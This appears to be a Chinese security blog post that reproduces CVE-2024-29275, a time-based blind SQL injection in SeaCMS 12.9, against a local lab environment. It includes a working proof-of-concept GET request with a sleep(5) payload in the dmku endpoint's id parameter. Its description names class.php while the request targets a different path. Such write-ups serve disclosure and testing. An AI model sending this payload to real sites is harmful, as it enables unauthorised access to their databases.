【成功复现】SeaCMS海洋影视管理系统SQL注入漏洞(CVE-2024-29275)

0x01漏洞介绍

SeaCMS是一套使用PHP编写的免费、开源的网站内容管理系统。该系统主要被设计用来管理视频点播资源。

SeaCMS 12.9版本存在安全漏洞,该漏洞源于存在SQL注入漏洞,允许未经身份验证的远程攻击者执行任意代码并通过class.php中的id参数获取敏感信息。

0x02影响版本

0x02影响版本

【成功复现】SeaCMS海洋影视管理系统SQL注入漏洞(CVE-2024-29275)

0x03漏洞复现

1.访问漏洞环境

【成功复现】SeaCMS海洋影视管理系统SQL注入漏洞(CVE-2024-29275)

2.对漏洞进行复现

POC (GET)

漏洞复现

GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Host: 127.0.1.
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36    

延时注入 5秒

【成功复现】SeaCMS海洋影视管理系统SQL注入漏洞(CVE-2024-29275)

3.nuclei工具测试(漏洞存在)

【成功复现】SeaCMS海洋影视管理系统SQL注入漏洞(CVE-2024-29275)

© 版权声明
THE END
喜欢就支持一下吧
点赞11 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容